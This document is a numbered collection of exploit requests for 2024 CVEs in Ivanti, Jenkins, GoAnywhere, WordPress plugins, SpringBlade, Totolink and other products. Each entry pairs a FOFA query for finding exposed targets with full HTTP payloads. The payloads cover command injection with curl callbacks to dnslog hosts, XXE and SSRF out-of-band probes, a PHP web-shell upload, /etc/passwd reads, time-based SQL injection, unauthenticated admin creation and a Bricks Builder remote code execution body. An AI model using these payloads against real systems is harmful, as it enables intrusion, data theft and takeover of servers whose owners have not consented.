99. Ncast 盈可视 HD smart recording and broadcasting system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML document; the XML is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings interface cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response (the first lines of the requested file are echoed back inside the CLI error message):
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated admin account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')